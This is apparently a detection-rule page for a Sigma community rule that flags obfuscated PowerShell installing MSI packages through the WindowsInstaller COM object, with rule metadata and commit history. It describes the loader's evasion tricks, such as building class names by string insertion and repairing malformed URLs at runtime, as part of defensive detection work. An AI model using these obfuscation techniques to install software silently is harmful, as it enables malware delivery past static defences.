Obfuscated PowerShell MSI Install via WindowsInstaller COM

Rule Info

Name
Obfuscated PowerShell MSI Install via WindowsInstaller COM
Author
Meroujan Antonyan (vx3r)
Description
Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`). The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
Reference
https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
Date
2025-05-27 00:00:00
Modified
None
Id
7b6a7418-3afc-11f0-aff4-000d3abf478c
Tags
attack.defense-evasion attack.t1027.010 attack.t1218.007 attack.execution attack.t1059.001
Type
Community Rule
Link to Public Repo
https://github.com/SigmaHQ/sigma/search?q=7b6a7418-3afc-11f0-aff4-000d3abf478c

Rule History

Author
Title
Date
Commit
vx3r
Merge PR #5436 from @vx3r - Obfuscated PowerShell MSI Install via WindowsInstaller COM
2025-06-04
8e4e286b0
THOR Logo  Scan your endpoints, forensic images or collected files with our portable scanner THOR
  Warning: Access to VALHALLA is rate-limited - once you prove unworthy, access gets denied
  Nextron Systems 2022